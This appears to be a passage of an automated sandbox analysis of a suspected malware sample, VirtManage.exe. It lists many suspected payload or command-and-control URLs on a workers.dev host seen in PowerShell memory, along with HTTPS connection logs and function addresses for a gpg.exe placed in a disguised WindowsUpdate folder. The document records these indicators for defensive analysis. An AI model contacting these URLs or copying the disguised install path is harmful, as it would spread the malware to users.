Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//OYvlzn0TEGRViMb/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//Owfy0f2dH3oT/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//PRdTn/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//QStkpLEFmyfM/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//QUDtWxYmTewx/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//S/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//SA8KJ/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//SPsEMc/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//T800gnfB8iUK/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//Ugcmg5sz/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//WyfDYiF/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//X6CpSM/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//ZCFyv2Jrg4xGVUb/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//Zuo02YbZogWtu/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//bAiffJVaBr6y5A3/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//dH7ZIkpmjh/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//et7hTw/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//fzoILk/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//gYnjnfUXSdaGeUY/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//hvT2/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//ih/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//jozQIGz51JdSO0C/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//kzaGbgv/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//lNrPaUz/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//m7N270kaCepoCJ4/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB511C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//mDCGkEd1r2G/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//mGxKMwrC6kjNZJt/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//nG3/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//o/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//o7/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//os2TIZI8Hw/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//p6BEACpr/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//pDOc1wxidSP/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//qk2H3jAf/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//r0UuOyyC1H0w/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//sg0RNaKiEEwIKgc/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//tkvHzrnRNt/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//uZh7AWhYvT/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//vh/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//vvIAbV/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//wtpzsq1/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//ybh/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB55F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//z6gBmVHR/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//zRUBLq/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn-app-web2.lenete5970.workers.dev//zu1DhajzS1I/
Source: powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000020.00000003.1203114481.0000021ACE8E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000020.00000003.1203114481.0000021ACE8B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E18122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: libgpg-error-0.dll.0.drString found in binary or memory: https://gnu.org/licenses/
Source: libgpg-error-0.dll.0.drString found in binary or memory: https://gnu.org/licenses/gpl.html
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://gnupg.org/faq/subkey-cross-certify.html
Source: VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, gpg.exe, 00000001.00000002.911220507.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000003.00000002.916510253.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000005.00000000.919861037.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 0000000A.00000002.978108643.00000000004FA000.00000002.00000001.01000000.00000006.sdmp, gpg.exe, 00000011.00000002.1005560897.00000000004FA000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://gnupg.org/faq/subkey-cross-certify.htmlWARNING:
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: https://gnupg.org0/
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB5C96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3339050433.0000021BB601B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E18965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1219498455.0000016E193D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 0000001B.00000002.3402117398.0000021BC47E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1244020803.0000016E27F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: VirtManage.exe, 00000000.00000003.883036527.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, VirtManage.exe, 00000000.00000003.883722945.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, libassuan-9.dll.0.dr, gpg-agent.exe.0.dr, libsqlite3-0.dll.0.dr, libgpg-error-0.dll.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.robware.net/about
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.62.135:443 -> 192.168.2.9:49759 version: TLS 1.2
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_0040573B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040573B
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004075BD0_2_004075BD
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004BF8C01_2_004BF8C0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0042D0701_2_0042D070
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0047A1501_2_0047A150
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004191691_2_00419169
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0044D1801_2_0044D180
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004A53001_2_004A5300
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004124401_2_00412440
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004E04001_2_004E0400
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004245701_2_00424570
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0040D5111_2_0040D511
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004745E01_2_004745E0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0048E5E01_2_0048E5E0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004986001_2_00498600
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004BB6F01_2_004BB6F0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004387E01_2_004387E0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004CC8C01_2_004CC8C0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004779401_2_00477940
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_00433AC01_2_00433AC0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0040CAD01_2_0040CAD0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004D2AE01_2_004D2AE0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_00434B601_2_00434B60
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004A2BF01_2_004A2BF0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_00406C101_2_00406C10
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0042DD101_2_0042DD10
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_00447EC01_2_00447EC0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0040DF281_2_0040DF28
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_630823601_2_63082360
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_630820031_2_63082003
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_630947001_2_63094700
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_630897901_2_63089790
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_630824301_2_63082430
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_630959C01_2_630959C0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_63083E301_2_63083E30
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_63081DC01_2_63081DC0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_656345071_2_65634507
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_655F35361_2_655F3536
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_6563E5BB1_2_6563E5BB
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_6563E5BF1_2_6563E5BF
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_656E044C1_2_656E044C
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_656464551_2_65646455
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_6561B4541_2_6561B454
